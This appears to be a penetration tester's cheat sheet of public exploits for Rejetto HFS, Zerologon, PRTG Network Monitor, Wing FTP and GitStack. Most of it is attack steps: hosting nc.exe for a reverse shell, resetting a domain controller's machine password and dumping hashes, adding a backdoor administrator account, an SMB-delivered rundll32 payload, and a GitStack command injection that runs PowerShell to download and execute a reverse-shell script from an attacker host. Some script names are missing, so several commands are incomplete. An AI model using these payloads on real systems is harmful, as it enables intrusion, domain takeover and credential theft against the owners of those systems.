Public Exploits

CVE-2019-1388: Windows Privilege Escalation Through UAC

Rejetto HTTP File Server RCE [HFS 2.3]

  • Host /usr/share/windows-resources/binaries/nc.exe on the attacker's web server and set up a listener.

  • Modify with the attacker's IP and the reverse-shell listening port.

  • Run the exploit: python <target-IP> <target-port>

Zerologon [CVE-2020-1472]

Write-up:

# Check for vulnerability

# Exploit: reset the password of the DC$ machine account to the blank NTLM hash
python3 <HYDRA-DC> <DC-IP>

# Dump hashes [31d6cfe0... is the NTLM hash of an empty password]
-hashes :31d6cfe0d16ae931b73c59d7e0c089c0 '<Domain>/<DC-Name$>@<IP>'

In case of an error, run the following commands:

python3 -m pip install virtualenv
python3 -m virtualenv impkt
source impkt/bin/activate
pip install git

PRTG Network Monitor [<18.2.39]

Automated Exploit

Adds a user to the Administrators group: pentest::P3nT3st

  • Log in to the app, grab your cookie and pass it to the script: ./ -u <Target> -c "<Cookie-value>"

Modify for Reverse Shell

  • Use Metasploit's smb_delivery to share the payload over port 445.

  • In, search for pentest to identify the payload.

  • Replace the payload code [URL-encode the payload]:

    • rundll32.exe \\pbMaor\memorycache.dll,0

    • Encoded: rundll32.exe%20%5C%5C10.10.0.172%5CpbMaor%5Cmemorycache.dll%2C0%0A

Manual Exploit

  • Testing for code execution

    • Setup -> Account Settings -> Notifications

    • Parameter: Test; ping -n 1 <IP>

    • On Kali Machine: sudo tcpdump -i tun0 ip proto \\icmp -vv

  • Use PowerShell one-liners to gain a foothold.

Wing FTP Authenticated RCE

  • Testing for code execution:

    • sudo tcpdump -i tun0 ip proto \\icmp -vv

    • os.execute('cmd.exe /c ping -n 1 <IP>')

  • Try with Metasploit:

    • use multi/script/web_delivery

    • set target 3

  • RCE affected versions: <

  • CVE-2019-6714

Exploit write-up:

GitStack RCE

  • Identify Repository: GET /rest/repository/

  • Identify Users: GET /rest/user/

  • Code execution via the password parameter: use Burp to intercept the Basic Auth request:

# Payload: <User-name>:C && cmd /c powershell.exe -ep bypass -c "IEX(New-Object Net.WebClient).DownloadString('http://<IP>/Invoke-PowerShellTcp.ps1')"

GET /web/index.php?p=<Repository name>.git&a=summary HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Authorization: Basic <Base64-Encoded Payload>
Connection: close